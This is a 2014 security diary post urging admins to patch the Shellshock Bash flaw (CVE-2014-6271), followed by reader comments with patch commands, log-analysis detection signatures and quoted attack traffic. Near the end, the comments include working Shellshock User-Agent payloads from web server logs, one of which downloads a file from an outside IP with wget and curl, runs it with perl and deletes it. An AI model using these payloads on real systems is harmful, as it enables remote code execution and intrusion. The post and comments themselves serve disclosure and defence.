Attention *NIX admins, time to patch!

Published: 2014-09-24. Last Updated: 2014-09-24 16:05:51 UTC
by Pedro Bueno (Version: 1)
7 comment(s)

Over the past years, we became used to Microsoft Patches, the important, critical ones that would render your system fully vulnerable if you didn't apply them. We probably became so used that sometime we forget that our Linux servers also need patches.

Today I've learned about a critical Bash patch, that addresses the CVE-2014-6271. According the advisory:

"A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."

The patches are already ready for most of the Linux distros, like RedHat and Debian, so waste no time.

---

Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure

Keywords: cve20146271
7 comment(s)

Comments

The good news is that it's an easy fix:

Debian (Ubuntu, etc.): apt-get upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash
We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. This monitor bash history and Apache logs for attempts. More information can be found at:

https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4

Apache:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)

Bash:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223
Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:

https://access.redhat.com/articles/1200223
We've just started seeing scanning traffic using the following packet contents:

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This also appears to be using spoofed source IP's. No logs at this time.
You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125 which is (to me), obviously a host for malware sites and this sort of activity.

It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).
Examples from my webserver log:

89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""


Shouldn't this rate setting the Threat Level to at least chartreuse?

Diary Archives